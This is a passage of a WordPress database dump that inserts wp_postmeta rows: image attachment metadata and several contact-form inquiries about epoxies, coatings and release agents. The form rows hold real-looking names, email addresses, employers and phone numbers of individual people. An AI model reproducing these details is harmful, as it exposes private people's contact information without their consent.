ebp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36824, 4103, '_wp_attached_file', '2017/05/shutterstock_136813127.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36825, 4103, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_136813127.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_136813127-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_136813127-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_136813127-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_136813127-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_136813127-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_136813127-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_136813127-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36826, 4104, '_wp_attached_file', '2017/05/shutterstock_554195710.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36827, 4104, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_554195710.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_554195710-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_554195710-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_554195710-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_554195710-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_554195710-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_554195710-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_554195710-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36828, 4105, '_wp_attached_file', '2017/05/shutterstock_280244540.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36829, 4105, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:665;s:4:"file";s:34:"2017/05/shutterstock_280244540.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280244540-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_280244540-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_280244540-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280244540-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280244540-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_280244540-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_280244540-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36830, 4108, '_wp_attached_file', '2017/05/shutterstock_479218552.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36831, 4108, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:733;s:4:"file";s:34:"2017/05/shutterstock_479218552.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_479218552-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_479218552-800x586.jpg";s:5:"width";i:800;s:6:"height";i:586;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_479218552-768x563.jpg";s:5:"width";i:768;s:6:"height";i:563;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_479218552-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_479218552-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_479218552-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_479218552-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36832, 4116, '_wp_attached_file', '2017/05/shutterstock_143173957.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36833, 4116, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_143173957.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_143173957-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_143173957-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_143173957-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_143173957-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_143173957-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_143173957-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_143173957-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36834, 4118, '_wp_attached_file', '2017/05/shutterstock_347358461.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36835, 4118, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:664;s:4:"file";s:34:"2017/05/shutterstock_347358461.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_347358461-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_347358461-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_347358461-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_347358461-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_347358461-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_347358461-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_347358461-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"15";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36836, 4119, '_wp_attached_file', '2017/05/shutterstock_384201610.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36837, 4119, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3750;s:6:"height";i:5000;s:4:"file";s:34:"2017/05/shutterstock_384201610.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384201610-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_384201610-600x800.jpg";s:5:"width";i:600;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"shutterstock_384201610-768x1024.jpg";s:5:"width";i:768;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_384201610-1200x1600.jpg";s:5:"width";i:1200;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384201610-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384201610-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_384201610-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_384201610-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"21";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36838, 4124, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36839, 4124, '_seq_num', '598'); 
INSERT INTO `wp_postmeta` VALUES (36840, 4124, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36841, 4124, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36842, 4124, '_field_1', 'Ivan Cardenas'); 
INSERT INTO `wp_postmeta` VALUES (36843, 4124, '_field_10', 'Ametek Aerospace &amp; Defense'); 
INSERT INTO `wp_postmeta` VALUES (36844, 4124, '_field_2', 'ivan.cardenas@ametek.com'); 
INSERT INTO `wp_postmeta` VALUES (36845, 4124, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36846, 4124, '_field_3', 'Please provide a quote (unit price) and lead time for the following product:\r\n\r\nMS-782 VERTREL XF CLEANING AGENT &amp; CERTIFICATE OF CONFORMANCE\r\nQTY: 2 (PER QUART)\r\n\r\nThank you,\r\nIvan Cardenas\r\nManufacturing Engineer\r\nAmetek Aerospace &amp; Defense\r\n17032 Armstrong Ave\r\nIrvine CA, 92614'); 
INSERT INTO `wp_postmeta` VALUES (36847, 4124, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36848, 4124, '_sub_id', '4124'); 
INSERT INTO `wp_postmeta` VALUES (36849, 4125, '_wp_attached_file', '2017/05/shutterstock_443216956.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36850, 4125, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:680;s:4:"file";s:34:"2017/05/shutterstock_443216956.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_443216956-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_443216956-800x544.jpg";s:5:"width";i:800;s:6:"height";i:544;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_443216956-768x522.jpg";s:5:"width";i:768;s:6:"height";i:522;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_443216956-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_443216956-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_443216956-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_443216956-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36851, 4127, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36852, 4127, '_seq_num', '599'); 
INSERT INTO `wp_postmeta` VALUES (36853, 4127, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36854, 4127, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36855, 4127, '_field_1', 'Joon Chatterjee'); 
INSERT INTO `wp_postmeta` VALUES (36856, 4127, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36857, 4127, '_field_2', 'joon.chatterjee@senseonics.com'); 
INSERT INTO `wp_postmeta` VALUES (36858, 4127, '_field_8', '(240) 778-6150'); 
INSERT INTO `wp_postmeta` VALUES (36859, 4127, '_field_3', 'I am interested to learn more about the following 2 products:\r\n(1) FLUOROPOLYMER MEDICAL COATINGS\r\n(2) SHIELDSYS COMPOUNDING ADDITIVES\r\n\r\nCan you share information such as:\r\n- brochure/tech data sheet \r\n- how are those coated/applied on\r\n- can we sample those materials for product development \r\n\r\nthanks,\r\nJoon Chatterjee\r\nPrincipal Chemical Process Engineer, Senseonics Inc\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36860, 4127, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36861, 4127, '_sub_id', '4127'); 
INSERT INTO `wp_postmeta` VALUES (36862, 4128, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36863, 4128, '_seq_num', '600'); 
INSERT INTO `wp_postmeta` VALUES (36864, 4128, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36865, 4128, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36866, 4128, '_field_1', 'Sean Ebihara'); 
INSERT INTO `wp_postmeta` VALUES (36867, 4128, '_field_10', 'University of Illinois Urbana-Champaign'); 
INSERT INTO `wp_postmeta` VALUES (36868, 4128, '_field_2', 'sebiha2@illinois.edu'); 
INSERT INTO `wp_postmeta` VALUES (36869, 4128, '_field_8', '(847) 418-1030'); 
INSERT INTO `wp_postmeta` VALUES (36870, 4128, '_field_3', 'Hello,\r\n\r\nI had a few questions regarding your Epikure W/Epikote Resin 862 system that I have purchased.\r\n\r\n(1) What is the thermal conductivity of the cured system?\r\n\r\n(2) Any data/information on the cured systems adhesion to other polymer systems, if possible any specific information on adhesion to silanes.\r\n\r\n Thank you,\r\n\r\nSean'); 
INSERT INTO `wp_postmeta` VALUES (36871, 4128, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36872, 4128, '_sub_id', '4128'); 
INSERT INTO `wp_postmeta` VALUES (36873, 4129, '_wp_attached_file', '2017/05/shutterstock_94133023.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36874, 4129, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:818;s:4:"file";s:33:"2017/05/shutterstock_94133023.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_94133023-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_94133023-800x654.jpg";s:5:"width";i:800;s:6:"height";i:654;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_94133023-768x628.jpg";s:5:"width";i:768;s:6:"height";i:628;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_94133023-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_94133023-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_94133023-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_94133023-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36875, 4130, '_wp_attached_file', '2017/05/wire-picture.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36876, 4130, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:818;s:4:"file";s:24:"2017/05/wire-picture.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"wire-picture-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"wire-picture-800x654.jpg";s:5:"width";i:800;s:6:"height";i:654;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"wire-picture-768x628.jpg";s:5:"width";i:768;s:6:"height";i:628;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"wire-picture-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"wire-picture-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"wire-picture-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"wire-picture-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36877, 4139, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36878, 4139, '_seq_num', '601'); 
INSERT INTO `wp_postmeta` VALUES (36879, 4139, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36880, 4139, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36881, 4139, '_field_1', 'Brian Dougherty'); 
INSERT INTO `wp_postmeta` VALUES (36882, 4139, '_field_10', 'US Navy'); 
INSERT INTO `wp_postmeta` VALUES (36883, 4139, '_field_2', 'brian.dougherty@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (36884, 4139, '_field_8', '(360) 396-2303'); 
INSERT INTO `wp_postmeta` VALUES (36885, 4139, '_field_3', 'Hi,\nWe are doing a repair using 100 parts (by wt) Epon 828 with 50 parts (by wt) Versamid 140.\nDo you have a feel as to what the expected Shore D hardness should be?\nThanks!\n   - Brian\n'); 
INSERT INTO `wp_postmeta` VALUES (36886, 4139, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36887, 4139, '_sub_id', '4139'); 
INSERT INTO `wp_postmeta` VALUES (36888, 4140, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36889, 4140, '_seq_num', '602'); 
INSERT INTO `wp_postmeta` VALUES (36890, 4140, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36891, 4140, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36892, 4140, '_field_1', 'Andrew Nash'); 
INSERT INTO `wp_postmeta` VALUES (36893, 4140, '_field_10', 'Hard Core Paddles'); 
INSERT INTO `wp_postmeta` VALUES (36894, 4140, '_field_2', 'andy@hardcorepaddles.co.nz'); 
INSERT INTO `wp_postmeta` VALUES (36895, 4140, '_field_8', '(206) 799-8687'); 
INSERT INTO `wp_postmeta` VALUES (36896, 4140, '_field_3', 'Hi, Im looking for a release agent to use in our paddle production.\r\nWe are using compression molds with a polyester gelcoat finish and we are producing epoxy paddle blades. Ideally we would like to achieve a satin finish out of the mold. Ideally we want as many releases as possible between re coating of release agent. Mold compression pressure is about 100 PSI max.\r\nwhat can you recomend?'); 
INSERT INTO `wp_postmeta` VALUES (36897, 4140, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36898, 4140, '_sub_id', '4140'); 
INSERT INTO `wp_postmeta` VALUES (36899, 4141, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36900, 4141, '_seq_num', '603'); 
INSERT INTO `wp_postmeta` VALUES (36901, 4141, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36902, 4141, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36903, 4141, '_field_1', 'Syed Wasim Akbar'); 
INSERT INTO `wp_postmeta` VALUES (36904, 4141, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36905, 4141, '_field_2', 'wasim.akbar@winkel-nayyar.com'); 
INSERT INTO `wp_postmeta` VALUES (36906, 4141, '_field_8', ''); 
